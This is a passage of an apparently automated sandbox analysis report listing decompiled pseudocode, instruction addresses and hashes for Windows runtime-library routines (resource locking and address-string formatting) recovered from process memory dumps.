                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L58;
                                                                                                                                                            					}
                                                                                                                                                            					_t84 = _t115;
                                                                                                                                                            					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                            					__eflags = _t84 - _t115;
                                                                                                                                                            					if(_t84 != _t115) {
                                                                                                                                                            						_t115 = _t84;
                                                                                                                                                            						goto L7;
                                                                                                                                                            					} else {
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L58:
                                                                                                                                                            			}



































                                                                                                                                                            0x0221055a
                                                                                                                                                            0x0221055d
                                                                                                                                                            0x02210563
                                                                                                                                                            0x02210566
                                                                                                                                                            0x022105d8
                                                                                                                                                            0x022105e2
                                                                                                                                                            0x022105e5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022105e7
                                                                                                                                                            0x022105e7
                                                                                                                                                            0x022105ea
                                                                                                                                                            0x022105f3
                                                                                                                                                            0x022105f3
                                                                                                                                                            0x02210568
                                                                                                                                                            0x02210568
                                                                                                                                                            0x02210568
                                                                                                                                                            0x02210569
                                                                                                                                                            0x02210569
                                                                                                                                                            0x02210569
                                                                                                                                                            0x0221056b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223217f
                                                                                                                                                            0x02232183
                                                                                                                                                            0x0223225b
                                                                                                                                                            0x0223225f
                                                                                                                                                            0x02232189
                                                                                                                                                            0x0223218c
                                                                                                                                                            0x0223218f
                                                                                                                                                            0x02232194
                                                                                                                                                            0x02232199
                                                                                                                                                            0x0223219d
                                                                                                                                                            0x022321a0
                                                                                                                                                            0x022321a2
                                                                                                                                                            0x022321ce
                                                                                                                                                            0x022321ce
                                                                                                                                                            0x022321ce
                                                                                                                                                            0x022321d0
                                                                                                                                                            0x022321d6
                                                                                                                                                            0x022321de
                                                                                                                                                            0x022321e2
                                                                                                                                                            0x022321e8
                                                                                                                                                            0x022321e9
                                                                                                                                                            0x022321ec
                                                                                                                                                            0x022321f1
                                                                                                                                                            0x022321f6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022321f8
                                                                                                                                                            0x022321fb
                                                                                                                                                            0x02232206
                                                                                                                                                            0x0223220b
                                                                                                                                                            0x0223220c
                                                                                                                                                            0x02232217
                                                                                                                                                            0x02232226
                                                                                                                                                            0x0223222b
                                                                                                                                                            0x0223222c
                                                                                                                                                            0x0223222f
                                                                                                                                                            0x02232232
                                                                                                                                                            0x02232235
                                                                                                                                                            0x02232235
                                                                                                                                                            0x0223223a
                                                                                                                                                            0x0223223f
                                                                                                                                                            0x02232241
                                                                                                                                                            0x02232243
                                                                                                                                                            0x02232248
                                                                                                                                                            0x02232248
                                                                                                                                                            0x0223224d
                                                                                                                                                            0x0223224f
                                                                                                                                                            0x02232262
                                                                                                                                                            0x02232263
                                                                                                                                                            0x02232268
                                                                                                                                                            0x02232269
                                                                                                                                                            0x02232269
                                                                                                                                                            0x02232269
                                                                                                                                                            0x0223226d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232276
                                                                                                                                                            0x02232279
                                                                                                                                                            0x0223227e
                                                                                                                                                            0x02232283
                                                                                                                                                            0x02232287
                                                                                                                                                            0x0223228a
                                                                                                                                                            0x0223228d
                                                                                                                                                            0x0223228f
                                                                                                                                                            0x022322bc
                                                                                                                                                            0x022322bc
                                                                                                                                                            0x022322bc
                                                                                                                                                            0x022322be
                                                                                                                                                            0x022322c4
                                                                                                                                                            0x022322cc
                                                                                                                                                            0x022322d0
                                                                                                                                                            0x022322d6
                                                                                                                                                            0x022322d7
                                                                                                                                                            0x022322da
                                                                                                                                                            0x022322df
                                                                                                                                                            0x022322e4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322e6
                                                                                                                                                            0x022322e9
                                                                                                                                                            0x022322f4
                                                                                                                                                            0x022322f9
                                                                                                                                                            0x022322fa
                                                                                                                                                            0x02232305
                                                                                                                                                            0x02232314
                                                                                                                                                            0x02232319
                                                                                                                                                            0x0223231a
                                                                                                                                                            0x0223231d
                                                                                                                                                            0x02232320
                                                                                                                                                            0x02232323
                                                                                                                                                            0x02232323
                                                                                                                                                            0x02232328
                                                                                                                                                            0x0223232d
                                                                                                                                                            0x0223232f
                                                                                                                                                            0x02232331
                                                                                                                                                            0x02232336
                                                                                                                                                            0x02232336
                                                                                                                                                            0x0223233b
                                                                                                                                                            0x0223233d
                                                                                                                                                            0x02232350
                                                                                                                                                            0x02232351
                                                                                                                                                            0x02232356
                                                                                                                                                            0x02232359
                                                                                                                                                            0x02232359
                                                                                                                                                            0x0223235b
                                                                                                                                                            0x0223235d
                                                                                                                                                            0x021f5367
                                                                                                                                                            0x021f536b
                                                                                                                                                            0x021f5372
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232363
                                                                                                                                                            0x02232363
                                                                                                                                                            0x02232369
                                                                                                                                                            0x0223236a
                                                                                                                                                            0x0223236c
                                                                                                                                                            0x02232371
                                                                                                                                                            0x02232373
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232379
                                                                                                                                                            0x02232379
                                                                                                                                                            0x0223237a
                                                                                                                                                            0x0223237f
                                                                                                                                                            0x0223237f
                                                                                                                                                            0x02232385
                                                                                                                                                            0x02232386
                                                                                                                                                            0x02232389
                                                                                                                                                            0x0223238e
                                                                                                                                                            0x02232390
                                                                                                                                                            0x021f5378
                                                                                                                                                            0x021f537c
                                                                                                                                                            0x02232396
                                                                                                                                                            0x02232396
                                                                                                                                                            0x02232397
                                                                                                                                                            0x0223239c
                                                                                                                                                            0x022323a2
                                                                                                                                                            0x022323a3
                                                                                                                                                            0x022323a6
                                                                                                                                                            0x022323ab
                                                                                                                                                            0x022323ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022323b3
                                                                                                                                                            0x022323b3
                                                                                                                                                            0x022323b4
                                                                                                                                                            0x022323b9
                                                                                                                                                            0x022323ba
                                                                                                                                                            0x022323ba
                                                                                                                                                            0x022323bc
                                                                                                                                                            0x022323bf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229153
                                                                                                                                                            0x02229158
                                                                                                                                                            0x0222915a
                                                                                                                                                            0x0222915e
                                                                                                                                                            0x02229160
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229166
                                                                                                                                                            0x02229166
                                                                                                                                                            0x02229171
                                                                                                                                                            0x02229176
                                                                                                                                                            0x02229176
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229160
                                                                                                                                                            0x022323c6
                                                                                                                                                            0x022323d7
                                                                                                                                                            0x022323d7
                                                                                                                                                            0x022323ad
                                                                                                                                                            0x02232390
                                                                                                                                                            0x02232373
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x02232291
                                                                                                                                                            0x02232291
                                                                                                                                                            0x02232293
                                                                                                                                                            0x02232295
                                                                                                                                                            0x0223229a
                                                                                                                                                            0x022322a1
                                                                                                                                                            0x022322a3
                                                                                                                                                            0x022322a7
                                                                                                                                                            0x022322a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322ab
                                                                                                                                                            0x022322ad
                                                                                                                                                            0x022322af
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322af
                                                                                                                                                            0x022322b1
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53cb
                                                                                                                                                            0x021f53ce
                                                                                                                                                            0x021f53d0
                                                                                                                                                            0x021f53d4
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53d8
                                                                                                                                                            0x021f53e3
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223228f
                                                                                                                                                            0x02232349
                                                                                                                                                            0x0223234d
                                                                                                                                                            0x02232251
                                                                                                                                                            0x02232251
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232251
                                                                                                                                                            0x022321a4
                                                                                                                                                            0x022321a4
                                                                                                                                                            0x022321a6
                                                                                                                                                            0x022321a8
                                                                                                                                                            0x022321ac
                                                                                                                                                            0x022321b6
                                                                                                                                                            0x022321b8
                                                                                                                                                            0x022321bc
                                                                                                                                                            0x022321be
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022321c0
                                                                                                                                                            0x022321c2
                                                                                                                                                            0x022321c4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022321c4
                                                                                                                                                            0x022321c6
                                                                                                                                                            0x022321c6
                                                                                                                                                            0x022321c8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022321c8
                                                                                                                                                            0x022321a2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232183
                                                                                                                                                            0x0221057b
                                                                                                                                                            0x0221057d
                                                                                                                                                            0x02210581
                                                                                                                                                            0x02210583
                                                                                                                                                            0x02232178
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210589
                                                                                                                                                            0x0221058f
                                                                                                                                                            0x0221058f
                                                                                                                                                            0x02210583
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02232206
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-4236105082
                                                                                                                                                            • Opcode ID: 4b9b7a3839331d8762c6dd056b2441ed33655dfe32ccc4883005a541dcbd6631
                                                                                                                                                            • Instruction ID: fcc098324f7c7352ffbb5095165cf8afb9b136b3f34aea166adc8d0735f6cbf4
                                                                                                                                                            • Opcode Fuzzy Hash: 4b9b7a3839331d8762c6dd056b2441ed33655dfe32ccc4883005a541dcbd6631
                                                                                                                                                            • Instruction Fuzzy Hash: F8513D71760312ABEB25CE98DC80F6633AAAF94710F214359ED55DB289DB71EC418B90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E022114C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v10;
                                                                                                                                                            				char _v140;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t24;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            				signed int _t29;
                                                                                                                                                            				signed int _t34;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				intOrPtr* _t52;
                                                                                                                                                            				void* _t54;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				void* _t58;
                                                                                                                                                            
                                                                                                                                                            				_t51 = __edx;
                                                                                                                                                            				_t24 =  *0x22b2088; // 0x7769ef74
                                                                                                                                                            				_v8 = _t24 ^ _t57;
                                                                                                                                                            				_t45 = _a16;
                                                                                                                                                            				_t53 = _a4;
                                                                                                                                                            				_t52 = _a20;
                                                                                                                                                            				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                            					L10:
                                                                                                                                                            					_t26 = 0xc000000d;
                                                                                                                                                            				} else {
                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                            						if( *_t52 == _t45) {
                                                                                                                                                            							goto L3;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						L3:
                                                                                                                                                            						_t28 =  &_v140;
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_push("[");
                                                                                                                                                            							_push(0x41);
                                                                                                                                                            							_push( &_v140);
                                                                                                                                                            							_t29 = E02207707();
                                                                                                                                                            							_t58 = _t58 + 0xc;
                                                                                                                                                            							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                            						}
                                                                                                                                                            						_t54 = E022113CB(_t53, _t28);
                                                                                                                                                            						if(_a8 != 0) {
                                                                                                                                                            							_t34 = E02207707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t34 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_t40 = E02207707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t40 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                            						 *_t52 = _t53;
                                                                                                                                                            						if( *_t52 < _t53) {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						} else {
                                                                                                                                                            							E021D2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                            							_t26 = 0;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return E021DE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                            			}




















                                                                                                                                                            0x022114c0
                                                                                                                                                            0x022114cb
                                                                                                                                                            0x022114d2
                                                                                                                                                            0x022114d6
                                                                                                                                                            0x022114da
                                                                                                                                                            0x022114de
                                                                                                                                                            0x022114e3
                                                                                                                                                            0x0221157a
                                                                                                                                                            0x0221157a
                                                                                                                                                            0x022114f1
                                                                                                                                                            0x022114f3
                                                                                                                                                            0x0223ea0f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ea15
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ea15
                                                                                                                                                            0x022114f9
                                                                                                                                                            0x022114f9
                                                                                                                                                            0x022114fe
                                                                                                                                                            0x02211504
                                                                                                                                                            0x0223ea1a
                                                                                                                                                            0x0223ea1f
                                                                                                                                                            0x0223ea21
                                                                                                                                                            0x0223ea22
                                                                                                                                                            0x0223ea27
                                                                                                                                                            0x0223ea2a
                                                                                                                                                            0x0223ea2a
                                                                                                                                                            0x02211515
                                                                                                                                                            0x02211517
                                                                                                                                                            0x0221156d
                                                                                                                                                            0x02211572
                                                                                                                                                            0x02211575
                                                                                                                                                            0x02211575
                                                                                                                                                            0x0221151e
                                                                                                                                                            0x0223ea50
                                                                                                                                                            0x0223ea55
                                                                                                                                                            0x0223ea58
                                                                                                                                                            0x0223ea58
                                                                                                                                                            0x0221152e
                                                                                                                                                            0x02211531
                                                                                                                                                            0x02211533
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02211535
                                                                                                                                                            0x02211541
                                                                                                                                                            0x02211549
                                                                                                                                                            0x02211549
                                                                                                                                                            0x02211533
                                                                                                                                                            0x022114f3
                                                                                                                                                            0x02211559

                                                                                                                                                            APIs
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 0223EA22
                                                                                                                                                              • Part of subcall function 022113CB: ___swprintf_l.LIBCMT ref: 0221146B
                                                                                                                                                              • Part of subcall function 022113CB: ___swprintf_l.LIBCMT ref: 02211490
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 0221156D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                            • Opcode ID: ba36dd7519852c7fe8908acf60451fce4df5bc5dcc22a1e9f7224c25a8eb9584
                                                                                                                                                            • Instruction ID: 29168c078a8fd7d0460b695e4765cb71bdf7995e5ff7e60e016a9d9727522645
                                                                                                                                                            • Opcode Fuzzy Hash: ba36dd7519852c7fe8908acf60451fce4df5bc5dcc22a1e9f7224c25a8eb9584
                                                                                                                                                            • Instruction Fuzzy Hash: 3F21B472920619EBDB21DE94CC40EEA73ECAF20704F444511ED4AD3148EB70AA688BD0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                            			E021F53A5(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t32;
                                                                                                                                                            				signed int _t37;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				signed int _t42;
                                                                                                                                                            				void* _t45;
                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				signed int _t64;
                                                                                                                                                            				signed int _t71;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                            				signed int* _t79;
                                                                                                                                                            				void* _t85;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				void* _t105;
                                                                                                                                                            
                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                            				_t32 =  *(_t64 + 0x28);
                                                                                                                                                            				_t71 = _t64 + 0x28;
                                                                                                                                                            				_push(_t92);
                                                                                                                                                            				if(_t32 < 0) {
                                                                                                                                                            					_t78 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                            						goto L3;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t32 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [ecx], eax");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L3:
                                                                                                                                                            					_push(_t86);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L4:
                                                                                                                                                            						__eflags = _t32;
                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t79 = _t64 + 0x24;
                                                                                                                                                            							_t71 = 1;
                                                                                                                                                            							asm("lock xadd [eax], ecx");
                                                                                                                                                            							_t32 =  *(_t64 + 0x28);
                                                                                                                                                            							_a4 = _t32;
                                                                                                                                                            							__eflags = _t32;
                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                            								L19:
                                                                                                                                                            								_t86 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x022b01c0;
                                                                                                                                                            									_push(_t92);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t37 = E021CF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                            									__eflags = _t37 - 0x102;
                                                                                                                                                            									if(_t37 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t71 =  *(_t92 + 4);
                                                                                                                                                            									_t85 =  *_t92;
                                                                                                                                                            									_t51 = E02214FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t85);
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                            									_t86 = _t86 + 1;
                                                                                                                                                            									_t105 = _t104 + 0x28;
                                                                                                                                                            									__eflags = _t86 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E0225217A(_t71, __eflags, _t64);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E02223F92();
                                                                                                                                                            									_t104 = _t105 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t37;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t37);
                                                                                                                                                            									E02213915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									_t40 =  *_t71;
                                                                                                                                                            									 *_t71 = 0;
                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                            										L1:
                                                                                                                                                            										_t42 = E021F5384(_t92 + 0x24);
                                                                                                                                                            										if(_t42 != 0) {
                                                                                                                                                            											goto L31;
                                                                                                                                                            										} else {
                                                                                                                                                            											goto L2;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                            										_push( &_a4);
                                                                                                                                                            										_push(_t40);
                                                                                                                                                            										_t49 = E021CF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                            										__eflags = _t49;
                                                                                                                                                            										if(__eflags >= 0) {
                                                                                                                                                            											goto L1;
                                                                                                                                                            										} else {
                                                                                                                                                            											_push(_t49);
                                                                                                                                                            											E02213915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                            											L31:
                                                                                                                                                            											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            											_push( &_a4);
                                                                                                                                                            											_push(1);
                                                                                                                                                            											_t42 = E021CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            											__eflags = _t42;
                                                                                                                                                            											if(__eflags >= 0) {
                                                                                                                                                            												L2:
                                                                                                                                                            												return _t42;
                                                                                                                                                            											} else {
                                                                                                                                                            												_push(_t42);
                                                                                                                                                            												E02213915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                            												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            												_push( &_a4);
                                                                                                                                                            												_push(1);
                                                                                                                                                            												_t42 = E021CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            												__eflags = _t42;
                                                                                                                                                            												if(__eflags >= 0) {
                                                                                                                                                            													goto L2;
                                                                                                                                                            												} else {
                                                                                                                                                            													_push(_t42);
                                                                                                                                                            													_t45 = E02213915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                            													asm("int3");
                                                                                                                                                            													while(1) {
                                                                                                                                                            														_t74 = _t45;
                                                                                                                                                            														__eflags = _t45 - 1;
                                                                                                                                                            														if(_t45 != 1) {
                                                                                                                                                            															break;
                                                                                                                                                            														}
                                                                                                                                                            														_t86 = _t86 | 0xffffffff;
                                                                                                                                                            														_t45 = _t74;
                                                                                                                                                            														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            														__eflags = _t45 - _t74;
                                                                                                                                                            														if(_t45 != _t74) {
                                                                                                                                                            															continue;
                                                                                                                                                            														} else {
                                                                                                                                                            															_t46 =  *[fs:0x18];
                                                                                                                                                            															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                            															return _t46;
                                                                                                                                                            														}
                                                                                                                                                            														goto L37;
                                                                                                                                                            													}
                                                                                                                                                            													E021F5329(_t74, _t92);
                                                                                                                                                            													_push(1);
                                                                                                                                                            													return E021F53A5(_t92);
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									_t32 =  *(_t64 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t71 =  *_t79;
                                                                                                                                                            								__eflags = _t71;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t57 = _t71;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t57 - _t71;
                                                                                                                                                            										if(_t57 == _t71) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t71 = _t57;
                                                                                                                                                            										__eflags = _t57;
                                                                                                                                                            										if(_t57 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t32 = _a4;
                                                                                                                                                            									__eflags = _t71;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L37;
                                                                                                                                                            					}
                                                                                                                                                            					_t71 = _t71 | 0xffffffff;
                                                                                                                                                            					_t32 = 0;
                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            					__eflags = 0;
                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                            						goto L4;
                                                                                                                                                            					} else {
                                                                                                                                                            						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L37:
                                                                                                                                                            			}

























                                                                                                                                                            0x021f53ab
                                                                                                                                                            0x021f53ae
                                                                                                                                                            0x021f53b1
                                                                                                                                                            0x021f53b4
                                                                                                                                                            0x021f53b7
                                                                                                                                                            0x022105b6
                                                                                                                                                            0x022105c0
                                                                                                                                                            0x022105c3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022105c9
                                                                                                                                                            0x022105c9
                                                                                                                                                            0x022105cc
                                                                                                                                                            0x022105d5
                                                                                                                                                            0x022105d5
                                                                                                                                                            0x021f53bd
                                                                                                                                                            0x021f53bd
                                                                                                                                                            0x021f53bd
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232269
                                                                                                                                                            0x0223226d
                                                                                                                                                            0x02232349
                                                                                                                                                            0x0223234d
